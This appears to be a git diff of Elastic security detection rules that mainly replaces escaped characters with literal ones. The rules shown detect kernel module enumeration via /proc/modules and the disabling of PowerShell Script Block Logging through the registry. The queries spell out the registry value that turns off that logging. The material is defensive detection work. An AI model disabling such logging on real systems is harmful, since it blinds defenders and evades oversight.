@@ -47,7 +47,7 @@ ], "risk_score": 21, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", "severity": "low", "tags": [ "OS: Linux", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_2.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_2.json index b3db371b9ef..e32ffe92f0f 100644 --- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_2.json +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_2.json 
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Kernel Modules via Proc", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and file.path == \"/proc/modules\" and not \n(\n process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\", \"SchedulerRunner\", \"grep\") or \n process.parent.pid == 1 or process.title : \"*grep*\"\n)\n", "required_fields": [ { 
@@ -51,7 +51,7 @@ ], "risk_score": 21, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_3.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_3.json index cf3d898f80a..c9606378b90 100644 --- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_3.json +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_3.json 
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Kernel Modules via Proc", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and file.path == \"/proc/modules\" and not \n(\n process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\", \"SchedulerRunner\", \"grep\") or \n process.parent.pid == 1 or process.title : \"*grep*\"\n)\n", "required_fields": [ { 
@@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_1.json b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_1.json index dfa2fb4bb65..7371c609a18 100644 --- a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_1.json +++ b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_1.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_2.json b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_2.json
index 010d2d9c277..b6a1f07d431 100644
--- a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_2.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/808291d3-e918-4a3a-86cd-73052a0c9bdc_1.json b/packages/security_detection_engine/kibana/security_rule/808291d3-e918-4a3a-86cd-73052a0c9bdc_1.json
index d35a76c831a..d325b231d38 100644
--- a/packages/security_detection_engine/kibana/security_rule/808291d3-e918-4a3a-86cd-73052a0c9bdc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/808291d3-e918-4a3a-86cd-73052a0c9bdc_1.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_100.json b/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_100.json
index 62309838f5f..feaf20a57ef 100644
--- a/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_100.json
+++ b/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_100.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_101.json b/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_101.json
index c1925dcee3d..c6dd32066b9 100644
--- a/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_101.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_1.json b/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_1.json
index 411e4222a4a..2fcf20415f0 100644
--- a/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_104.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_104.json
index 0bedca184dc..013b892a79a 100644
--- a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_104.json
@@ -17,7 +17,7 @@ "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ - "https://admx.help/?Category=Windows_10_2016\u0026Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_105.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_105.json index 3abc8825da1..18c6c26dbde 100644 --- a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_105.json 
@@ -17,7 +17,7 @@ "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ - "https://admx.help/?Category=Windows_10_2016\u0026Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], "related_integrations": [ { @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_106.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_106.json index bcf65adfa5e..9ae724e07e5 100644 --- a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_106.json 
@@ -17,7 +17,7 @@ "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ - "https://admx.help/?Category=Windows_10_2016\u0026Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_107.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_107.json index 5304bbd83af..aec97aede2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_107.json +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_107.json 
@@ -17,7 +17,7 @@ "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
